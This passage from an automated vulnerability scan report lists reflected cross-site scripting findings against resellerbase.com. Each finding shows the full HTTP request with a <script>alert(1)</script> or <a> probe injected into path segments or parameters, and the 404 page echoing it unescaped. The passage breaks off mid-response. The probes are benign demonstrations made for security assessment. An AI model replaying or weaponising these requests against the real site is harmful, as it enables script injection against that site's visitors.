Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1a298<script>alert(1)</script>aac68c348d/20/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1731. http://www.resellerbase.com/detail/20/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce624<script>alert(1)</script>460a129bd32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20ce624<script>alert(1)</script>460a129bd32/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20ce624<script>alert(1)</script>460a129bd32/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1732. http://www.resellerbase.com/detail/20/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ed61f<script>alert(1)</script>d87c2aa85c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themesed61f<script>alert(1)</script>d87c2aa85c5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themesed61f<script>alert(1)</script>d87c2aa85c5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1733. http://www.resellerbase.com/detail/20/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7a02<script>alert(1)</script>d8eb12cb671 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/search.phpe7a02<script>alert(1)</script>d8eb12cb671?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.phpe7a02<script>alert(1)</script>d8eb12cb671?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1734. http://www.resellerbase.com/detail/20/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f35b2<a>f8dd2ebb1da was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/search.php?keyword=search...&Submit3=Searchf35b2<a>f8dd2ebb1da&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.php?keyword=search...&Submit3=Searchf35b2<a>f8dd2ebb1da&opt=2 was not found on this server.</p>
...[SNIP]...

2.1735. http://www.resellerbase.com/detail/20/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d64a4<a>55c20344992 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/search.php?keyword=search...d64a4<a>55c20344992&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.php?keyword=search...d64a4<a>55c20344992&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1736. http://www.resellerbase.com/detail/20/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef163<script>alert(1)</script>11ef2f1a845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2&ef163<script>alert(1)</script>11ef2f1a845=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2&ef163<script>alert(1)</script>11ef2f1a845=1 was not found on this server.</p>
...[SNIP]...

2.1737. http://www.resellerbase.com/detail/20/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c2377<a>dc6584ee893 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2c2377<a>dc6584ee893 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2c2377<a>dc6584ee893 was not found on this server.</p>
...[SNIP]...

2.1738. http://www.resellerbase.com/detail/22/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8e5d<script>alert(1)</script>60a7e29858e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild8e5d<script>alert(1)</script>60a7e29858e/22/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild8e5d<script>alert(1)</script>60a7e29858e/22/ was not found on this server.</p>
...[SNIP]...

2.1739. http://www.resellerbase.com/detail/22/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cab64<script>alert(1)</script>06218b9637b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22cab64<script>alert(1)</script>06218b9637b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22cab64<script>alert(1)</script>06218b9637b/ was not found on this server.</p>
...[SNIP]...

2.1740. http://www.resellerbase.com/detail/22/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 19423<script>alert(1)</script>edc32bce17b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/?19423<script>alert(1)</script>edc32bce17b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/?19423<script>alert(1)</script>edc32bce17b=1 was not found on this server.</p>
...[SNIP]...

2.1741. http://www.resellerbase.com/detail/22/loveme-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/loveme-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a76cc<script>alert(1)</script>d9def71cce0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila76cc<script>alert(1)</script>d9def71cce0/22/loveme-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila76cc<script>alert(1)</script>d9def71cce0/22/loveme-com.html was not found on this server.</p>
...[SNIP]...

2.1742. http://www.resellerbase.com/detail/22/loveme-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/loveme-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d031<a>be1b5a105fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/225d031<a>be1b5a105fa/loveme-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/225d031<a>be1b5a105fa/loveme-com.html was not found on this server.</p>
...[SNIP]...

2.1743. http://www.resellerbase.com/detail/22/loveme-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/loveme-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c99e1<script>alert(1)</script>2e28f4d42b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/c99e1<script>alert(1)</script>2e28f4d42b5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/c99e1<script>alert(1)</script>2e28f4d42b5 was not found on this server.</p>
...[SNIP]...

2.1744. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86be6<script>alert(1)</script>6120d5352a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail86be6<script>alert(1)</script>6120d5352a4/22/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail86be6<script>alert(1)</script>6120d5352a4/22/rating.php was not found on this server.</p>
...[SNIP]...

2.1745. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a8cae<script>alert(1)</script>788b712f9291a0962 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaila8cae<script>alert(1)</script>788b712f9291a0962/22/rating.php?id=22&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila8cae<script>alert(1)</script>788b712f9291a0962/22/rating.php?id=22&rating=5 was not found on this server.</p>
...[SNIP]...

2.1746. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec1bc<script>alert(1)</script>5c602d45b00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22ec1bc<script>alert(1)</script>5c602d45b00/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22ec1bc<script>alert(1)</script>5c602d45b00/rating.php was not found on this server.</p>
...[SNIP]...

2.1747. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5441a<script>alert(1)</script>fb65b5e3fbae1d7db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/225441a<script>alert(1)</script>fb65b5e3fbae1d7db/rating.php?id=22&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/225441a<script>alert(1)</script>fb65b5e3fbae1d7db/rating.php?id=22&rating=5 was not found on this server.</p>
...[SNIP]...

2.1748. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bc976<script>alert(1)</script>03252a877bcc68883 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/22/rating.phpbc976<script>alert(1)</script>03252a877bcc68883?id=22&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/rating.phpbc976<script>alert(1)</script>03252a877bcc68883?id=22&rating=5 was not found on this server.</p>
...[SNIP]...

2.1749. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1322d<script>alert(1)</script>c600f5ea121 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/rating.php1322d<script>alert(1)</script>c600f5ea121 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
